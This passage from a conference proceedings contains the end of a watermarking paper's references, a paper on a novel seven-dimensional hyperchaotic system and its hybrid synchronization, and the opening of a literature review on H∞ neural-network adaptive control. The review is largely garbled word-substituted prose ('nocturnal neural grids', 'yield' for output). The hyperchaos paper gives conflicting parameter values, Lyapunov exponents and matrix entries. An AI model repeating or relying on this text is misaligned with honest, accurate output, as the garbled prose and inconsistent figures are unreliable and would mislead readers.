Krawtchouk transform with optimization. Journal of Ambient Intelligence and Humanized
Computing, 1–12.
25. Abdelhakim, A., Saleh, H., & Nassar, A. (2016). A quality guaranteed robust image
watermarking optimization with Artificial Bee Colony. Expert Systems with Applications, 72.
26. Sejpal, S., & Shah, N. (2016). A novel multiple objective optimized color watermarking scheme
based on LWT-SVD domain using nature based bat algorithm and firefly. In 2016 IEEE Inter-
national Conference on Advances in Electronics, Communication and Computer Technology
(ICAECCT) (pp. 38–44).
Comparative Analysis: Role of Meta-Heuristic Algorithms … 327

27. Sisaudia, V., & Vishwakarma, V. (2020). Copyright protection using KELM-PSO based multi-
spectral image watermarking in DCT domain with local texture information based selection.
Multimedia Tools and Applications, 1–22.
28. Maloo, S., Kumar, M., & Lakshmi, N. (2020). A modified whale optimization algorithm based
digital image watermarking approach. Sensing and Imaging, 1–22.
30. Kazemivash, B., & Ebrahimi Moghaddam, M. (2017). A robust digital image watermarking
technique using lifting wavelet transform and firefly algorithm. Multimedia Tools and
Applications, 76.
30. Moeinaddini, E. (2019). Selecting optimal blocks for image watermarking using entropy and
distinct discrete firefly algorithm. Soft Computing., 23, 1–15.
31. Karaboga, D. (2005). An idea based on Honey Bee swarm for numerical optimization
(pp. 1–10). Erciyes University, Engineering Faculty, Computer Engineering Department,
Kayseri/Türkiye, Technical report-Tr06.
32. Karaboga, D., & Basturk, B. (2007). Artificial Bee Colony (ABC) optimization algorithm for
solving constrained optimization problems. Foundations of fuzzy logic and soft computing.
In 12th International Fuzzy Systems Association World Congress, IFSA 2007 (pp. 789–798),
Cancun, Mexico 4529.
33. Karaboga, D., & Akay, B. (2009). A comparative study of artificial bee colony algorithm.
Applied Mathematics and Computation, 214(1), 108–132.
34. Kennedy, J., & Eberhart, R. (1995). Particle swarm optimization. In Proceedings of IEEE
International Conference on Neural Networks (pp. 1942–1948). Institute of Electrical and
Electronics Engineers, New York.
35. Zhou, N., Luo, A., Zou, W. P. (2018). Secure and robust watermark scheme based on multiple
transforms and particle swarm optimization algorithm. Multimedia Tools Application, 1–17.
36. Dubolia, R., Singh, R., Bhadoria, S., & Gupta, R. (2011). Digital image watermarking by using
discrete wavelet transform and discrete cosine transform and comparison based on PSNR.
In IEEE International Conference on Communication Systems and Network Technologies
(pp. 593–596).
37. Xu, H., Kang, X., Wang, Y., Wang, Y. (2018). Exploring robust and blind watermarking
approach of colour images in DWT-DCT-SVD domain for copyright protection. Inderscience
International Journal of Electronic Security and Digital Forensics, 10(1), 79–96.
38. Nguyen, P. –B., Luong, M., & Beghdadi, A. (2010). Statistical analysis of image quality metrics
for watermark transparency assessment. 6297, 685–696.
39. Lin, Y., & Abdulla, W. (2011). Objective quality measures for perceptual evaluation in digital
audio watermarking. IET Signal Processing, 5(7), 623–631.
40. Marini, E., Autrusseau, F., Le Callet, P., Campisi, P. (2007). Evaluation of standard water-
marking techniques. In Electronic Imaging, Security, Steganography, and Watermarking of
Multimedia Contents, San Jose, United States: 6505-24.
A Novel Seven-Dimensional Hyperchaotic

M. Lellis Thivagar, Abdulsattar Abdullah Hamad, B. Tamilarasan,


and G. Kabin Antony

Abstract In this work, we consider five positive Lyapunov exponents based on state
feedback control, and this paper constructs a novel 7D hyperchaotic system. Various
significant aspects of a new mechanism, including equilibrium points, stability, and
exponents of Lyapunov, are evaluated. The computer modeling shows that complex
dynamical behaviors such as chaotic, hyperchaotic, and periodic are demonstrated
by the new system.The dynamic properties of this theoretical and numerical simu-
lation system are analyzed on the basis of equilibrium points, stability, dissipation,
Lyapunov drivers, and the phase image. In addition, different attractants or multiple
susceptibility factors with different initial conditions are investigated under the same
parameters. Moreover, hybrid synchronization between two similar and identical
systems is achieved through the nonlinear control strategy and Lyapunov stability
theory by MATLAB. A good coincidence was obtained by analyzing numerical and
theoretical system dynamics on the basis of the equilibrium points here may be a good
application in the field of encryption and nonlinear circuits for the new hyperchaotic
system.

Keywords Chaotic system · Synchronization · Lyapunov · Stability · Equilibrium

1 Introduction

The mathematical meteorologist Edward N. Lorenz discovered the first famous


three-dimensional (3D) chaotic system computational formula with real variables
in 1963 that has only one positive exponent with Lyapunov, two quadratic regular
and planned course. Subsequently, in 1976, Rössler introduced another 3D chaotic
system, that also consists of six terms, but only one polynomial nonlinearity. Some
of the well-known concepts of the 3D chaotic system are Chen System, [1–4]. The
first four-dimensional (4D) In 1979, Rössler performed a scheme including two posi-
tive Lyapunov derivations, including real variables, and several 4D chaotic schemes

M. L. Thivagar · A. A. Hamad (B) · B. Tamilarasan · G. K. Antony


School of Mathematics, Madurai Kamaraj University, Madurai, Tamilnadu, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 329
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_27
330 M. L. Thivagar et al.

were found in the literature [5, 6]. Both those methods are defined by two posi-
tive Lyapunov exponents, and the size of the hyperchaotic systems is linked to the
quantity of positive Lyapunov exponents, thus the minimum scale for hyperchaotic
structures is four [1, 7]. A hyperchaotic system is considered to be a system with
more than one positive Lyapunov inverse, while a chaotic system is called a system
only with one positive Lyapunov opposite [7, 10]. In order to maximize the amount
of positive Lyapunov derivations, the size of the system must be doubled. Lately,
there is great interest in building 5D hyperchaotic structures with three positive
Lyapunov exponents, such as the regard to the issue Hu system 2009 [7] and Yang
[8]. The hyperchaotic system with a higher dimension is effective and importable
compared to the low dimension due to its higher unpredictability and randomness and
has better performance compared to the traditional 3D, 4D, and 5D systems. Until
now, a number of works related to this subject have been increased, and numerous
papers on the construction of new high-dimensional (6D) systems with four positive
Lyapunov exponents have been published [9–14]. In 2018, Yang et al. build a 6D
hyperchaotic system with four positive Lyapunov exponents: LEA 1 = 0.4302, LEA
2 = 0.2185, LEA 3 = 0.1294, LEA 4 = 0.0775, LEA 5 = -0.0001, LEA 6 = −
12.5222, consisting of 16-term; three terms are nonlinear and| described by Eq. [13]:


⎪ ẋ1 (t) = a(x2 − x1 ) + x4 + r x6



⎪ 2 (t) = cx1 − x2 − x1 x3 + x5



ẋ3 (t) = −bx3 + x1 x2
(1)
⎪ ẋ4 (t) = d x4 − x1 x3




⎪ ẋ5 (t) = −hx2 + x6


ẋ6 (t) = k1 x1 + k2 x2

where (x1 (t), to, x6 (t))T ∈ R 6 is the real state variables of the system (1), and
abdh = 0, a, b, c are constraint parameters, d, h, r, k1 , k2 are the control parameters.

2 The 7D Hyperchaotic System

Model predictive controller based on a new class of high-dimensional (7D) hyper-


chaotic system is proposed via adding nonlinear controller x7 to the first equation of
the system (1), a 7D hyperchaotic system is constructed, which is described as:
A Novel Seven-Dimensional Hyperchaotic 331

Fig. 1 Attractors of new system: a x1 − x3 − x4 space and b x3 − x6 plane



⎪ ẋ1 (t) = a(x2 − x1 ) + x4 + r x6 − x7



⎪ ẋ2 (t) = cx1 − x2 − x1 x3 + x5



⎨ ẋ3 (t) = −bx3 + x1 x2
ẋ4 (t) = d x4 − x1 x3 (2)



⎪ ẋ5 (t) = −hx2 + x6



⎪ ẋ6 (t) = px1 + q x2


ẋ7 (t) = x1 x2 − kx7

where (x‘1 (t), to x‘7 (t))T ∈ R‘7 is the real state variables of the system (2), a, b, c,
d, h, r, k1 , k2 are the constant real parameters, k3 is The parameter of control that
defines the dynamic behavior. When a = 10, b = 8/3, c = 28, d = 2, h = 9.9, r =
1, p = 1, q = 2, and k = 12, the above system has a hyperchaotic attractor as
shown in Fig. 1. Thus, the new class system consists of 19 terms; four of them are
nonlinearities.

2.1 Equilibrium and Stability

If the right-hand side of system (2) is equal to zero, then the equilibrium points are
solving the following equations
332 M. L. Thivagar et al.


⎪ a(x2 − x1 ) + x4 + r x6 − x7 = 0



⎪ cx1 − x2 − x1 x3 + x5 = 0



⎨ −bx3 + x1 x2 = 0
d x4 − x1 x3 = 0 (3)



⎪ −hx 2 + x6 = 0



⎪ k 1 1 + k2 x 2 = 0
x


x 1 x 2 − k3 x 7 = 0

Then it has only one equilibrium point O(0, 0, 0, 0, 0, 0, 0). The Jacobian matrix
of system (2) at origin point is
⎡ ⎤
−a a 0 1 0 r −1
⎢ c −1 0 ⎥
⎢ 0 0 1 0 ⎥
⎢ 0 −b 0 ⎥
⎢ 0 0 0 0 ⎥
⎢ ⎥
J (O) = ⎢ 0 0 0 d 0 0 0 ⎥
⎢ ⎥
⎢ 0 −h 0 0 0 1 0 ⎥
⎢ ⎥
⎣ p q 0 0 0 0 0 ⎦
0 0 0 0 0 0 −k

Based on law |J (O) − λI | = 0, with I, the 7 × 7 identity matrix,


the characteristic equation and eigenvalues at (a, b, c, d, h, r, p, q, k) =
(10, 8/3, 28, 2, 9.9, 1, 1, 2, 12), respectively, as:

71 6 1191 5 49529 4 1867 3


λ7 + λ − λ − λ − λ
3 10 15 2
48935 2 13332 12768
+ λ − λ+ =0
3 5 5


⎪ λ1 = 2



⎪ λ2 = −12


λ3 = − 83

⎪ λ4 = 11.4755



⎪ 5 = −22.6229
λ


λ6,7 = 0.0737 ± 0.3850i

It is clear that some roots with positive real parts, therefore the point O is unstable.
So, the system (2) is classified as a self-excited attractors (if the system possess
unstable equilibrium points, then this system is called a system with self-excited
attractors).
A Novel Seven-Dimensional Hyperchaotic 333

Fig. 2 Lyapunov exponents, of the new 7D system

2.2 Lyapunov Exponents and Lyapunov Dimension

The numerical simulation was carried out with Wolf algorithm and MATLAB soft-
ware, a = 9, b = 7/3, c = 27, d = 2, h = 9, r = 1, p = 1, q = 2, k = 12 System
(2) is hyperchaotic and also has five inverse of positive Lyapunov,

LE1 = 0.42401, LE2 = 0.21088, LE3 = 0.11102, LE4 = 0.025979,


LE5 = 0.0023358, LE6 = −11.6305, LE7 = −12.7881

The exponents of the Lyapunov plot are shown in Fig. 2.


To explore the influence of parameters on the dynamics of 7D systems (1), fix
with a = 9, b = 73 , c = 27, d = 2, p = 1, q = 2, h = 9, r = 1 and vary. The
process (2) transforms into chaotic or hyperchaotic, but these results are obtained
from the Wolf algorithm in Table 1.

3 Hybrid Synchronization of the New 7D Hyperchaotic


Systems

Assume that the structure (2) is the system of the drive and can be written as
334 M. L. Thivagar et al.

Table 1 Exponents of Lyapunov for certain values of k


K LE1 LE2 LE3 LE4 LE5 LE6 LE7 Dynamics
0.01 0.167 −0.008 −0.219 −1.017 −2.967 −8.380 −8.380 Period orbits
0.19 0.029 −0.071 −0.084 −0.025 −0.430 − − Period orbits
11.336 11.336
0.5 0.225 0.0149 −0.014 −0.053 −0.529 − − Chaos
11.310 11.310
0.75 0.263 0.066 0.000 −0.054 −0.512 − − Quasi-periodic
11.587 11.587
2.3 0.318 0.199 0.008 −0.109 −0.770 − − Hyperchaos
12.459 12.459
2.55 0.336 0.143 −0.024 −0.074 −0.802 − − Chaos
12.204 12.204
2.8 0.299 0.176 0.007 −0.136 −0.962 − − Hyperchaos
12.192 12.192
3.1 0.338 0.126 0.011 −0.047 −0.957 − − Hyperchaos
12.054 12.054
7.5 0.444 0.221 0.000 1.694 −1.100 − − Hyperchaos
12.577 12.577
12 0.41305 0.21088 0.10127 0.025979 0.0023358 − − Hyperchaos
11.6305 12.7881

⎡ ⎤ ⎡ ⎤⎡ ⎤ ⎡ ⎤
ẋ1 −a a 0 1 0 r −1 x1 0 0 0 0
⎢ ẋ ⎥ ⎢ c 0 ⎥ ⎢x ⎥ ⎢1 0⎥
⎢ 2⎥ ⎢ −1 0 0 1 0 ⎥⎢ 2 ⎥ ⎢ 0 0 ⎥ ⎡ −x x ⎤
⎢ ẋ ⎥ ⎢ 0 −b 0 ⎥ ⎢ ⎥ ⎢ 0⎥
1 3
⎢ 3⎥ ⎢ 0 0 0 0 ⎥⎢ x3 ⎥ ⎢ 0 1 0 ⎥⎢
⎢ ⎥ ⎢ ⎥⎢ ⎥ ⎢ ⎥ ⎢ x1 x2 ⎥⎥
⎢ ẋ4 ⎥ = ⎢ 0 0 0 d 0 0 0 ⎥⎢ x4 ⎥ + ⎢ 0 0 1 0⎥⎣ (4)
⎢ ⎥ ⎢ ⎥⎢ ⎥ ⎢ ⎥ −x1 x3 ⎦
⎢ ẋ5 ⎥ ⎢ 0 −h 0 0 0 1 0 ⎥⎢ x5 ⎥ ⎢ 0 0 0 0⎥
⎢ ⎥ ⎢ ⎥⎢ ⎥ ⎢ ⎥ x1 x2
⎣ ẋ6 ⎦ ⎣ p q 0 0 0 0 0 ⎦⎣ x6 ⎦ ⎣ 0 0 0 0⎦  
ẋ7 0 0 0 0 0 0 −k x7 0 0 0 1 C1
   
A1 B1

The A1 matrix shows the system matrix parameter (2), and the B1 . C 1 product
describes the nonlinear part of the system (2).The response system is given by:
⎡ ⎤ ⎡ ⎤ ⎛ ⎡ ⎤⎞
ẏ1 y1 u1
⎢ ẏ ⎥ ⎢y ⎥ ⎜ ⎢ u ⎥⎟ ⎡ ⎤
⎢ 2⎥ ⎢ 2⎥ ⎜ ⎢ 2 ⎥⎟ −y1 y3
⎢ ẏ ⎥ ⎢y ⎥ ⎜ ⎢ u ⎥⎟
⎢ 3⎥ ⎢ 3⎥ ⎜ ⎢ 3 ⎥⎟ ⎢ y1 y2 ⎥
⎢ ⎥ ⎢ ⎥ ⎜ ⎢ ⎥⎟
⎢ ẏ4 ⎥ = A2 ⎢ y4 ⎥ + ⎜ B2 C2 + ⎢ u 4 ⎥⎟, C2 = ⎢ ⎥
⎣ −y1 y3 ⎦ (5)
⎢ ⎥ ⎢ ⎥ ⎜ ⎢ ⎥⎟
⎢ ẏ5 ⎥ ⎢ y5 ⎥ ⎜ ⎢ u 5 ⎥⎟
⎢ ⎥ ⎢ ⎥ ⎜ ⎢ ⎥⎟ y1 y2
⎣ ẏ6 ⎦ ⎣ y6 ⎦ ⎝ ⎣ u 6 ⎦⎠
ẏ7 y7 u7
A Novel Seven-Dimensional Hyperchaotic 335

And let U = [u 1 , u 2 , u 3 , u 4 , u 5 , u 6 , u 7 ]T is the nonlinear controller that is to be


built.
• If A1 = A2 and B1 = B2 then refer to identical systems,
• If A1 = A2 or/and B1 = B2 then refer to non-identical systems (different).
The synchronization error dynamics between the 7D hyperchaotic system (4) and
system (5) is defined as ei = yi − αxi , where

1 i = 1, 3, 5, 7(odd)
α=
−1 i = 2, 4, 6(even)

And satisfied that, lim ei = 0.


t→∞
The error dynamics is calculated as the following:


⎪ ė1 = ae2 − 2ax2 − ae1 + e4 − 2x4 + r e6 − 2r x6 − e7 + u 1



⎪ ė = ce1 + 2cx1 − e2 + e5 + 2x5 − y1 e3 + x3 e1 − 2y1 x3 + u 2
⎪ 2


⎨ ė3 = −be3 + e1 e2 − x2 e1 + x1 e2 − 2x1 x2 + u 3
ė4 = de4 − y1 e3 + x3 e1 − 2y1 x3 + u 4 (6)



⎪ ė5 = −he2 + 2 hx2 + e6 − 2x6 + u 5



⎪ ė6 = pe1 + 2 px1 + qe2 + u 6


ė7 = −ke7 + e1 e2 − x2 e1 + x1 e2 − 2x1 x2 + u 7

Theorem
If the control U of system (6) is designed as the following:


⎪ u1 = 2ax2 + 2x4 − r e6 + 2r x6 − ce2 − x3 e2 − pe6



⎪ u2 = −ae1 − 2cx1 − 2x5 + 2y1 x3 − x1 e3 − qe6 − x1 e7



⎨ u3 = y1 e2 − e1 e2 + x2 e1 + 2x1 x2 + y1 e4
u4 = −2de4 − e1 − x3 e1 + 2y1 x3 (7)



⎪ u5 = −2hx2 + 2x6 − e5



⎪ u6 = −2 px1 − e5 − e6


u7 = e1 − e1 e2 + x2 e1 + 2x1 x2

Then the system (5) can follow the system (4).

Proof Substitute above control in the error dynamics system (6) we get:
336 M. L. Thivagar et al.


⎪ ė = ae2 − ae1 + e4 − e7 − ce2 − x3 e2 − pe6
⎪ 1


⎪ ė2 = ce1 − e2 + e5 − y1 e3 + x3 e1 − ae1 − x1 e3 − qe6 − x1 e7



⎨ ė3 = −be3 + x1 e2 + y1 e2 + y1 e4
ė4 = −de4 − y1 e3 − e1 (8)



⎪ ė5 = −he2 + e6 − e5



⎪ ė6 = pe1 + qe2 − e5 − e6


ė7 = −ke7 + x1 e2 + e1

In the linearization method, the characteristic equation and eigenvalues as

89 6 6529 5 238931 4 1182143 3


λ7 + λ + λ + λ − λ
3 10 30 30
291515 2 1944721 1163288
+ λ + λ+ =0
3 15 15


⎪ λ1 = − 83



⎨ λ2 = −11.9657
λ3 = −2.0021



⎪ λ4,5 = −1.1984 ± 1.4399i

⎩ λ = −5.3177 ± 17.8223i
6,7

Clearly, all the real parts of their own values are negative, and the linearization
approach realized the chaos of the HS between the system (4) and the system (4, 5).
If the Lyapunov feature is built as

1 2
7
V (ei ) = e = [e1 , e2 , e3 , e4 , e5 , e6 , e7 ]T
2 i=1 i
⎡ ⎤⎡ ⎤
0.5 0 0 0 0 0 0 P
⎢ 0 0.5 0 0 0 0 0 ⎥⎢ e ⎥
⎢ ⎥⎢ 2 ⎥
⎢ 0 0 0.5 0 0 0 0 ⎥⎢ e ⎥
⎢ ⎥⎢ 3 ⎥
⎢ ⎥⎢ ⎥
⎢ 0 0 0 0.5 0 0 0 ⎥⎢ e4 ⎥
⎢ ⎥⎢ ⎥
⎢ 0 0 0 0 5/99 0 0 ⎥⎢ e5 ⎥
⎢ ⎥⎢ ⎥
⎣ 0 0 0 0 0 0.5 0 ⎦⎣ e6 ⎦
0 0 0 0 0 0 0.5 e7
 
T

The derivative of the above function V (ei ) is

10
V̇ (ei ) = e1 ė1 + e2 ė2 + e3 ė3 + e4 ė4 +
e5 ė5 + e6 ė6 + e7 ė7
99
V̇ (e) = e1 (ae2 − ae1 + e4 − e7 − ce2 − x3 e2 − pe6 )
+ e2 (ce1 − e2 + e5 − y1 e3 + x3 e1 − ae1 − x1 e3 − qe6 − x1 e7 )
A Novel Seven-Dimensional Hyperchaotic 337

Fig. 3 New attractor of proposed 7D, (X 1 , X 2 , X 7 )

+ e3 (−be3 + x1 e2 + y1 e2 + y1 e4 ) + e4 (−de4 − y1 e3 − e1 )
10
+ e5 (−he2 + e6 − e5 ) + e6 ( pe1 + qe2 − e5 − e6 )
99
+ e7 (−ke7 + x1 e2 + e1 )
⎡ ⎤⎡ ⎤
10 0 00 0 0 0 e1
⎢ 0 00 0 0 0 ⎥ ⎢ ⎥
⎢ 1 ⎥⎢ e2 ⎥
⎢ 0 8
0 0 0 0 ⎥ ⎢ ⎥
⎢ 0 ⎥⎢ e3 ⎥
T⎢ ⎥⎢ ⎥
3
V̇ (ei ) = −[e1 , e2 , e3 , e4 , e5 , e6 , e7 ] ⎢ 0 0 0 2 0 0 0 ⎥⎢ e4 ⎥
⎢ ⎥⎢ ⎥
⎢ 0 0 0 0 10/99 0 0 ⎥⎢ e5 ⎥
⎢ ⎥⎢ ⎥
⎣ 0 0 0 0 0 1 0 ⎦⎣ e6 ⎦
0 0 0 0 0 0 12 e7

 
where Q = diag 9, 1, 73 , 2, 10 99
, 1, 12 , so Q > 0. Consequently, V̇ (ei ) is
negative definite on R 7 . The nonlinear controller is sufficient and it achieves the HS.
Now, we will take the initial values as (15, 2, 0, −2, −3, 0) and
(−15, −10, −8, 6, 0, −4) to illustrate the HS that happened between (4) and
(5) numerically. Figures 3 and 4 verify these results numerically, respectively
(Figs. 5 and 6).

4 Dissections

The proposed work is clarified by its new positive majority parameters consider
five positive Lyapunov exponents based on state feedback control, and this paper
constructs a novel 7D hyperchaotic system. Various significant aspects of a new
mechanism, including equilibrium points, stability, and exponents of Lyapunov, are
evaluated. The computer modeling shows that complex dynamical behaviors such as
338 M. L. Thivagar et al.

Fig. 4 New attractor of


proposed 7D, (X 1 , X 3 , X 6 )

Fig. 5 New attractor of


proposed 7D, (X 3 , X 4 , X 6 )
A Novel Seven-Dimensional Hyperchaotic 339

Fig. 6 Convergence of system

chaotic, hyperchaotic, and periodic are demonstrated by the new system. The hybrid
synchronization (HS) between two extremely similar by Lyapunov stability theory
for a current scheme is also reported in this section.
Figures 1, 2, and 3 illustrate Lyapunov exponents, of the new 7D system, and
the new attractor of the proposed 7D with a = 9, b = 7/3, c = 27, d = 2, p =
1, q = 2, h = 9, r = 1, and vary. Table 1 shows the system (2) is ‘evolve Sees
results arederived from the Wolf algorithm,
 in chaotic or hyperchaotic, and where
Q = diag 9, 1, 73 , 2, 10 99
, 1, 12 , so Q > 0. Consequently, V̇ (ei ) is negative
definite on R 7 . The nonlinear controller is sufficient and it achieves the HS.

5 Conclusions

In this paper, by introducing a nonlinear controller to the first equation of the five
Lorenz system, a novel seven-dimensional continuous real variable hyperchaotic
system with five positive Lyapunov exponents was suggested. In addition, with two
analytical methods, Lyapunov’s and linearization method, some characteristics of
dynamic behaviors such as equilibrium points, stability, and Lyapunov exponents are
investigated, based on nonlinear control strategy. There may be a good application
in the field of encryption and nonlinear circuits for the new hyperchaotic system.

Acknowledgements The authors acknowledges Rashtriya Uchchatar Shiksha Abhiyan (RUSA)


for providing financial support under RUSA-MKU—Research Project Scheme.
340 M. L. Thivagar et al.

References

1. Wang, W., & Guan, Z. H. (2006). Generalized synchronization of continuous chaotic system.
Chaos, Solitons & Fractals, 27(1), 97–101.
2. Al-Azzawi, S. F. (2012). Stability and bifurcation of Pan chaotic system by using Routh-Hurwitz
and Gardan method. Applied Mathematics and Computation, 219(3), 1144–1152.
3. Khalaf, O. I., Ajesh, F., Hamad, A. A., Nguyen, G. N., & Le, D. N. (2020). Efficient dual-
cooperative bait detection scheme for collaborative attackers on mobile ad-hoc networks. IEEE
Access, 8, 227962–227969.
4. AL-Azzawi, S. F., et al. (2020). Chaotic Lorenz system and it’s suppressed. Journal of Advanced
Research in Dynamical and Control Systems, 12(2), 548–555.
5. Zhang, G., et al. (2017). On the dynamics of new 4D Lorenz-type chaos systems. Advances in
Difference Equations, 2017(1).
6. Abed, K. A. (2020). Controlling of jerk chaotic system via linear feedback control strategies.
Indonesian Journal of Electrical Engineering and Computer Science, 20(1), 370–378.
7. Zhu, C. (2010). Control and synchronize a novel hyperchaotic system. Applied Mathematics
and Computation, 216(1), 276–284.
8. Thivagar, M. L., & Abdullah Hamad, A. (2020). A theoretical implementation for a proposed
hyper-complex chaotic system. Journal of Intelligent & Fuzzy Systems, 38(3), 2585–2595.
9. Thivagar, L. M., Hamad, A. A., & Ahmed, S. G. (2020). Conforming dynamics in the metric
spaces. Journal of Information Science and Engineering, 36(2), 279–291.
10. Thivagar, M. L., Ahmed, M. A., Ramesh, V., & Hamad, A. A. (2020). Impact of non-linear
electronic circuits and switch of chaotic dynamics. Periodicals of Engineering and Natural
Sciences, 7(4), 2070–2091.
11. Al-Azzawi, S. F., Thivagar, M. L., Al-Obeidi, A. S., & Hamad, A. A. (2020). Hybrid synchro-
nization for a novel class of 6D system with unstable equilibrium points. Materials Today:
Proceedings. https://doi.org/10.1016/j.matpr.2020.10.524.
12. Thivagar, M. L., & Hamad, A. A. (2019). Topological geometry analysis for complex dynamic
systems based on adaptive control method. Periodicals of Engineering and Natural Sciences,
7(3), 1345–1353.
13. Hamad, A. A., Al-Obeidi, A. S., & Al-Taiy, E. H. (2020). Synchronization phenomena inves-
tigation of a new nonlinear dynamical system 4D by Gardano’s and Lyapunov’s methods.
Computers, Materials & Continua, 66(3), 3311–3327.
14. Abed, F. N., Hamad, A. A., & Sapit, A. B. (2020). The effect analysis for the nano powder
dielectric processing of ti-6242 alloy is performed on wire cut-electric, discharge. Materials
Today Proceedings. https://doi.org/10.1016/j.matpr.2020.09.368.
A Literature Review on H∞ Neural
Network Adaptive Control

Parul Kashyap

Abstract In this literature survey, the writing reachable for the H∞ adaptive
control engineering utilizing neural systems for frameworks whose uncertainty has
an ambiguous structure. This engineering merge thoughts from powerful control
hypothesis, for example, H∞ control structure, the little addition hypothesis, and
L dependability hypothesis with Lyapunov security hypothesis and current hypo-
thetical accomplishments in uncertainty control to build up an adaptive design for
frameworks whose vagueness fulfills a neighborhood Lipschitz bound. The strategy
enables a control originator to rearrange adaptive tuning method, band limit adaptive
control sign, in addition indulgence unequaled vagueness in a solitary plan system.
Powerful control configuration limits the impact of uncertainty and nonlinearity to
the detriment of diminished execution. The plan outline work is like that utilized in
powerful control, yet without giving up execution. The majority of this is adjusted,
while giving thoughts of transient execution limits subject to the qualities of two
straight frameworks and the adjustment gain. The relevance of neural networks in the
control systems, feed forward neural networks direct and indirect adaptive controls,
H∞ controller is also reviewed.

Keywords Neural network · Feed forward neural network · Adaptive control ·


h-infinity control · Lipschitz nonlinearities

1 Introduction

Model reference adaptive control (MRAC) takes various favorable circumstances


concluded present day straight model-based control plan strategies. Established tech-
niques are constrained by uncertainties and nonlinearities. Powerful control configu-
ration decreases the impact of uncertainty and nonlinearity to the detriment of dimin-
ished execution. Be that as it may, both of these strategies offer upside of recurrence
restricted control activity. Adaptive control offers likelihood of accomplishing a lot

P. Kashyap (B)
Department of Electrical Engineering, Madan Mohan Malaviya University of Technology,
Gorakhpur, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 341
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_28
342 P. Kashyap

advanced level of strong execution. Be that as it may, a noteworthy weakness of adap-


tive control is that it does not have acknowledged methods for measuring the conduct
of the control signal apriority. The H∞ adaptive engineering is a blend structure that
permits utilization of direct control plan strategies to accomplish possibly lower
transmission capacity control signals utilizing surely knew plan apparatuses. This
permits the structure procedure to turn out to be natural. Change of straight control
configuration enables unity to switch amid reference model following error as well
as adaptive control exertion during way explicitly ideal as for the H∞ standard. This
literature survey introduces the H∞ adaptive control design for system by Lipschitz
bound scheduled its vagueness. The combination tactic looks near blend thoughts
since hearty controller hypothesis, for example, H∞ control structure in addition to
the small gain theorem, L steadiness hypothesis besides Lyapunov strength as of
nonlinear control, with later hypothetical accomplishments in adaptive control [6,
7]. By presenting a number of extra structures of framework vagueness, a bound on
Lipschitz steady, recurrence area contemplations can be presented in the adaptive
plan.
The majority of this is practiced, while giving thoughts of transient execution
limits. The displayed standard limits on the transient execution enables an architect to
guarantee that reaction remains inside an ideal error resistance of reference prototyp-
ical by expanding adjustment gain with diminishing H∞ standard of dual distinctive
direct frameworks. Since framework state be limited to a ball by process able size,
investigation be legitimate locally Lipchitz nonlinearities [8]. In addition, however
the limits be able to traditionalist; limits be calculable utilizing straight forward
numerical methodology in addition to H∞ ideal control systems give direction with
respect to how to stifle these limits.

2 Neural Networks

By displaying neuron, neural system times past could be pursued back. The primary
representation of a nerve cell was utilized by physiologists, McCulloch with Pitts.
The primary demonstrated neuron was by means of single yield just as dual fonts of
statistics. They build up by unbiased single statistics energetic, neuron non culmina-
tion awake dynamic. Twofold yield was found for information were of single and a
similar weight, the yield observed zero data sources calculated to sift seize esteem.
Rosenblatt urbanized perceptron since subsequently form to accomplish
“learning.” Rosenblatt new trial as well as error method plus interconnected percep-
trons haphazardly to modify weights [9]. The recovered representation for electro-
chemical system is copy framed through McCulloch in addition Pitts.’ This nerve cell
by premise popular arena of contemporary nocturnal neural grids [16]. Perceptron
appears to look like neuron however perceptron likeness ensures non validate intricate
electrochemical trials which in fact depart on inside a nerve cell. Nerve cell works
identical a voltage-to-recurrence interpreter for motive that of electrochemical tech-
nique of a nerve cell. Neuron proclamations for reason that of compound response
A Literature Review on H∞ Neural Network … 343

when specific edge is work by neuron, at that point conflagration advanced recur-
rence. While superior contribution approach interested in neuron although enormity
of yield commencing neuron is alike [14]. Tremendously, straightforward numerical
portrayal of neuron is perceptron.
In light of limiting error squared and accepting an ideal reaction existed, a slope
seek approach was executed. Later that scheming is acknowledged as least mean
squares (LMS). Concluded latest link of centuries LMS in addition subject arrays are
mostly operated in a variety of uses. Aimed at restrictive error scientific technique
was given. By inclination seek strategy, experimentation process is not learning.
Weight break thought to perceptron was conveyed by means of Selfridge [2, 3]. If
exhibition did not develop, plus another asymmetrical course vector stayed elected.
The directly above stands technique that is eluded by way of mounting elevation.
Subsequently, vivacity by restricted it is eluded as diving proceeding inclination. A
scientific technique was twisted aimed at altering tons via Nguyen in addition Hoff
[6].
Back propagation re-experienced without restrictions. N−1 node neural organiza-
tion might build along with equipped via concocting perceptrons in multilayer array.
The loads to facilitate in beginning by means of output layer loads are balanced
by back propagation. Representation of perceptron is capable of changing by back
propagation estimation utilizing sigmoidal capacity like squashing capacity. Signum
work was utilized by perceptron of prior forms. Sigmoidal capacity is differentiable
wherever signum work has constructive position headed for enable neural system near
merge just before a neighboring least. Slope statistics can switch operating nonlinear
censorship dimensions through back propagation intention. Angle records can switch
exploiting nonlinear censorship dimensions next to back propagation algorithm an
incredible wellspring of restored prototypical for electrochemical system by proto-
typical framed through McCulloch in addition Pitts’. During field of neural systems
meeting credentials be generally excellent. Around 25 years prior brilliant time
system examine ended. Currently, investigation from place to place here being re-
invigorated subsequently disclosure back propagation. Connection being exploited
feed-forward neuronal scheme in addition to frequent commentators utilized. Neural
system determination be foundation of effort finished in investigation in favor of
feed-forward neural system along with back propagation set of rules.

2.1 Feed-Forward Neural Network

Among censorship capacity normally sigmoidal capacity, feed forward neural system
be a system perceptrons. Utilizing limiting error squared, back propagation algorithm
modifies weights [7]. For changing loads over numerous concealed films back prop-
agation algorithm permits differentiable censorship capacity. In direction of modify
loads n-distinct issues be able to illuminated. Select OR plus XOR question be
capable of unraveled by containing numerous nodes on each level. Starting contribu-
tion to output feed-forward neural system is associated in addition to on contiguous
344 P. Kashyap

layers every node be associated with each joint. The yield as of an earlier layer be
contribution to hub if hub be lying on yield layer plus contribution toward neural
organization being influence to pivot. On way to formulate neural organization vital
is pivot. To set up neural framework key is hub. On double, heaps of one individual
hub can be distorted by altering heaps using back inducing figuring. Scheduled inter-
